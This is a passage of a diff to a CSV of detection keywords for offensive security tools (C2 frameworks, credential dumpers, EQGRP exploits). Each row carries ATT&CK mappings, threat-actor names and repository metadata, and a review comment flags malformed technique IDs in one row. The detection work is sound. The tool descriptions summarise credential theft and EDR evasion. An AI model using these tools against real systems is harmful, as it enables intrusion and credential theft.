T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gexplorer.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*ghost_* -v*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_sparc*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_x86*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*GhostInTheNet off*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet on*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet.sh *","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" 
@@ -10872,28 +11023,28 @@ "*GhostPack/ForgeCert*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*GhostPack/Koh*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*GhostPack/SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. 
the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" -"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" -"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - 
T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*gimmecredz*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. 
such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*ginuerzh/gost*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" "*Gioyik/getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*git log -p | scanrepo *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in 
LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*github*/DeathStar*","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1529","339","2022-12-08T07:44:30Z","2017-05-21T07:34:57Z" -"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*github*/Mr-xn/*","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*github*/padre.git*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*github.com/Arno0x*","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/BishopFox*","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. 
serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*github.com/dafthack*","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*github.com/GoSecure*","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/k8gege*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*github.com/nccgroup*","offensive_tool_keyword","Github Username","github repo name hosting securty tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/quickbreach*","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/rasta-mouse/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" 
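Review bot: The `*github.com/bishopfox/*` row re-emitted in this hunk writes its sub-techniques with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1569-002`), while the other rows visible here use the dotted ATT&CK form (`T1548.002`, `T1021.002`). A consumer that matches dotted IDs in `metadata_tool_techniques` would presumably fail to map this sliver rule to any technique, so the alert loses its ATT&CK context. I would rewrite the field in dotted form, starting `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004`, and confirm that `T1573-003` to `T1573-005` correspond to real sub-techniques before keeping them. The keyword also matches every repository under that organisation, not only sliver, which is worth recording in `metadata_comment` so analysts triage hits accordingly.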
@@ -10902,12 +11053,12 @@ "*github.io/weakpass/generator/*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*GithubC2-main*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*gitleaks detect*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13893","1249","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" +"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. 
in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13901","1250","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" "*Git-Scanner*","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","303","82","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" -"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - 